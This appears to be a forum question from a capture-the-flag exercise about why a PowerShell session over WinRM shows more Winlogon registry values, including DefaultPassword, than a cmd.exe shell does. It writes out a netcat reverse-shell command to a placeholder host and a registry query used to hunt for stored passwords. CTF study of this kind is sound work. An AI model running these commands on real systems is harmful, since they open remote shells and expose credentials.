# Powershell (WinRM) and cmd.exe: reg query output deviation

Tags: windows, privilege-escalation, powershell, registry, cmd

during a CTF I encountered the following anomaly regarding PS & cmd.exe:

- I got access to a Windows x86 server through WinRM Port 5985 using evil-winrm. (https://github.com/Hackplayers/evil-winrm) This spawns a PS shell.
- Via the PS shell I transferred nc.exe to the machine and used *cmd.exe /c "nc.exe IP PORT -e cmd.exe"* to spawn an additional regular cmd.exe shell back to me.

I searched the registry for stored passwords using the following command: *reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"*

This is where I noticed that the PS shell reg query returns considerable more output than the cmd.exe reg query. PS includes the "DefaultPassword" entry, whereas cmd.exe does **not** include this value.

The full output deviation is captured in the following screenshot:
[image: req query on powershell shows more entries than req query on cmd.exe]
The same behavior is observable for other registry items. PS generally returns more elements than the cmd.exe "sub-shell".

Any hints to why this behavior occurs are greatly appreciated.

Edit: As requested here a screenshot on the whoami /all output of both shells:
[image: whoami /all output on PS and cmd]

Comment: What is the output of `whoami /all` in each shell?

Comment: @phbits I added the output to the original post. I could not find a difference between the two, though.